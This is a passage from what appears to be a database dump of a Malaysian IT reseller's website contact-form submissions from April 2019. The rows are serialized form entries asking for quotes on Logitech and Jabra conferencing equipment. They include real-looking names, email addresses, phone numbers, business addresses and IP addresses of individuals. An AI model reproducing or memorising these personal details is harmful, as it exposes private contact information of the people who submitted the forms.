(Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"Muhammad Hazim b Yanan\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:23:\"mhazim.yanan@ape.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0129789657\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:18:\"Janoschka Malaysia\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:84:\"121, Jalan Permata 2/3, Arab Malaysian Industrial Park, 71800 Nilai, Negeri Sembilan\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Logitech Group\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"09\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-04-03 16:05:44','143.192.98.42','1'),(136,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"CHONG KAI LUM\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"kaich@tpaerospace.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"017 3373909\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:29:\"TP Aerospace Malaysia Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:49:\"May i have a quote for Zebra Printer Model GK420d\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-04-04 12:37:13','219.92.28.53','1'),(137,12,'a:11:{i:0;a:7:{s:2:\"id\";s:3:\"126\";s:4:\"slug\";s:19:\"get-quotation-jabra\";s:4:\"name\";s:21:\"Get Quotation (Jabra)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:3:\"129\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:4:\"opie\";}i:2;a:7:{s:2:\"id\";s:3:\"130\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:30:\"procurement1@explorerterra.com\";}i:3;a:7:{s:2:\"id\";s:3:\"133\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0142848270\";}i:4;a:7:{s:2:\"id\";s:3:\"131\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:29:\"pelangi oil &amp; gas sdn bhd\";}i:5;a:7:{s:2:\"id\";s:3:\"135\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:107:\"Lot 2483(b) Ground Floor Lorong 6, Jln Kuching, Taman Tunku Industrial Area, 98000 Miri, Sarawak, Malaysia.\";}i:6;a:7:{s:2:\"id\";s:3:\"134\";s:4:\"slug\";s:7:\"product\";s:4:\"name\";s:7:\"Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:642:\"a:19:{i:0;s:16:\"Jabra Evolve 65t\";i:1;s:15:\"Jabra Evolve 80\";i:2;s:16:\"Jabra Evolve 75e\";i:3;s:15:\"Jabra Evolve 75\";i:4;s:29:\"Jabra Evolve 65 Stereo / Mono\";i:5;s:29:\"Jabra Evolve 40 Stereo / Mono\";i:6;s:29:\"Jabra Evolve 30 Stereo / Mono\";i:7;s:29:\"Jabra Evolve 20 Stereo / Mono\";i:8;s:18:\"Jabra Evolve 20 SE\";i:9;s:15:\"Jabra Engage 50\";i:10;s:17:\"Jabra Biz 2400 II\";i:11;s:29:\"Jabra BIZ 2400 II Mono 3-in-1\";i:12;s:21:\"Jabra Biz 2400 II DUO\";i:13;s:14:\"Jabra Biz 2300\";i:14;s:17:\"Jabra BIZ 2300 QD\";i:15;s:21:\"Jabra BIZ 2300 QD DUO\";i:16;s:14:\"Jabra Biz 1500\";i:17;s:22:\"Jabra Biz 1500 DUO USB\";i:18;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:15:\"Jabra Evolve 75\";}i:7;a:7:{s:2:\"id\";s:3:\"132\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:48:\"Jabra Evolve 75 incl. charging stand MS 30 UNITS\";}i:8;a:7:{s:2:\"id\";s:3:\"125\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:3:\"127\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:3:\"125\";s:5:\"value\";s:2:\"27\";}i:10;a:7:{s:2:\"id\";s:3:\"128\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:3:\"125\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Jabra)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-04-04 14:14:25','175.145.81.81','1'),(138,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:5:\"Donna\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"donna@instapaytech.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0143213296\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:29:\"Instapay Technologies Sdn bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:39:\"We require video conferencing solutions\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-04-04 18:35:19','192.228.224.88','1'),(139,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:8:\"harinder\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"harinder@chevron.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0126617212\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:16:\"chevron malaysia\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:48:\"level 3 menara milenium, pusat bandar damansara.\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Logitech Rally\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:92:\"please provide quote for Rally nad group 15m extender cables, quote for group i already have\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-04-05 11:17:55','146.23.203.233','1'),(140,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:8:\"Willment\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"Foong.phan@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0163375910\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"Designedge (M)Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:36:\"72-01,laman rimbunan,52100 Kepong,KL\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Logitech Group\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:99:\"I need to connect to two nos of TV at the same time for conference call to Hong Kong.Isit possible?\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"88\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-04-05 11:35:55','118.100.196.249','1'),(141,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:9:\"Habib Ali\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"habibmdali@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"60188714203\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:5:\"YDKMM\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:61:\"Would like to buy solution for conference call in a classroom\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-04-06 20:01:48','115.133.20.231','1'),(142,12,'a:11:{i:0;a:7:{s:2:\"id\";s:3:\"126\";s:4:\"slug\";s:19:\"get-quotation-jabra\";s:4:\"name\";s:21:\"Get Quotation (Jabra)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:3:\"129\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"Alvin Chew\";}i:2;a:7:{s:2:\"id\";s:3:\"130\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"achew@firstsolar.com\";}i:3;a:7:{s:2:\"id\";s:3:\"133\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0194804099\";}i:4;a:7:{s:2:\"id\";s:3:\"131\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"First Solar\";}i:5;a:7:{s:2:\"id\";s:3:\"135\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:103:\"8, Jalan Hi-Tech 3/3, Zon Industri Fasa 3, Kulim Hi-Tech Park, 09000 Kulim, Kedah Darul Aman, Malaysia.\";}i:6;a:7:{s:2:\"id\";s:3:\"134\";s:4:\"slug\";s:7:\"product\";s:4:\"name\";s:7:\"Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:642:\"a:19:{i:0;s:16:\"Jabra Evolve 65t\";i:1;s:15:\"Jabra Evolve 80\";i:2;s:16:\"Jabra Evolve 75e\";i:3;s:15:\"Jabra Evolve 75\";i:4;s:29:\"Jabra Evolve 65 Stereo / Mono\";i:5;s:29:\"Jabra Evolve 40 Stereo / Mono\";i:6;s:29:\"Jabra Evolve 30 Stereo / Mono\";i:7;s:29:\"Jabra Evolve 20 Stereo / Mono\";i:8;s:18:\"Jabra Evolve 20 SE\";i:9;s:15:\"Jabra Engage 50\";i:10;s:17:\"Jabra Biz 2400 II\";i:11;s:29:\"Jabra BIZ 2400 II Mono 3-in-1\";i:12;s:21:\"Jabra Biz 2400 II DUO\";i:13;s:14:\"Jabra Biz 2300\";i:14;s:17:\"Jabra BIZ 2300 QD\";i:15;s:21:\"Jabra BIZ 2300 QD DUO\";i:16;s:14:\"Jabra Biz 1500\";i:17;s:22:\"Jabra Biz 1500 DUO USB\";i:18;s:32:\"Other (Please specify the 